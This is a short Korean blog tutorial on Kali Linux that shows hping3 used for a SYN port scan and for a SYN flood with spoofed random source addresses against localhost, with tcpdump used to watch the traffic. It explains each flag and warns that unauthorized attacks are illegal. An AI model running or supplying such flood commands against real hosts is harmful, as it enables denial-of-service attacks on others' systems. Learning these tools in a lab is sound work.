hping3를 이용한 포트 스캔 및 DDOS 공격
↑ 특정 ip에 대하여 포트 스캔을 1~1024번 TCP 포트까지 Syb Flag( -S )를 세팅하여 수행한 경우이다.
hping3를 이용한 DDOS 공격
<허가되지 않는 공격은 범법행위 입니다!>
hping3 --rand-source 127.0.0.1 -p 80 -S --flood
--rand-source : 발신자의 ip를 무작위로 생성
127.0.0.1 : 타겟의 ip
-p 80 : 포트번호 80
-S --flood : syn packet을 계속 보낸다.
↑ root@kali:~# ifconfig // ifconfing 명령을 통해 현재 네트워크 인터페이스 상태를 볼 수 있다.
# 타겟으로 지정된 것은 인터페이스 lo
↑ root@kali:~# tcpdump -i [인터페이스 명] // tcpdump는 네트워크 패킷을 엿볼 수 있다. ( 스니핑 기능 )
↑ root@kali:~# tcpdump -i lo // 인터페이스 lo의 패킷을 보고 있다.
↑ root@kali:~# hping3 --rand-source 127.0.0.1 -p 80 -S --flood // 타겟 127.0.0.1에 DDos 공격을 실행중
# 127.0.0.1 에게 가는 막대한 양의 패킷을 볼 수 있다.
칼리 리눅스 - metasploit database no connection 문제 해결하기 (2) | 2019.02.23 |
---|---|
칼리 리눅스 아파치 웹 서버 설정 파일 (0) | 2018.12.05 |
SSH 서비스 root접근 제한하기 (0) | 2018.11.11 |
Promiscuous Mode를 이용한 Sniffing (0) | 2018.11.11 |
원격에서 접근하는 사용자 파악하기( feat. who ) (0) | 2018.03.06 |
좀 알려주세요 현기증 난단 말이에요..